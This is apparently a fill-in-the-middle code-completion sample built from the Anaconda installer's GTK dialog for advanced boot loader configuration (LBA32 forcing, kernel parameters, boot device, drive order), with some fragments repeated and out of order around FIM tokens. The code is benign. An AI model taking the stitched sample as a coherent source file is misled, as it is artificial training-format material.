self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox
<|fim▁end|> | InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window |
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window
def getPrev(self):
<|fim_middle|>
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox
<|fim▁end|> | pass |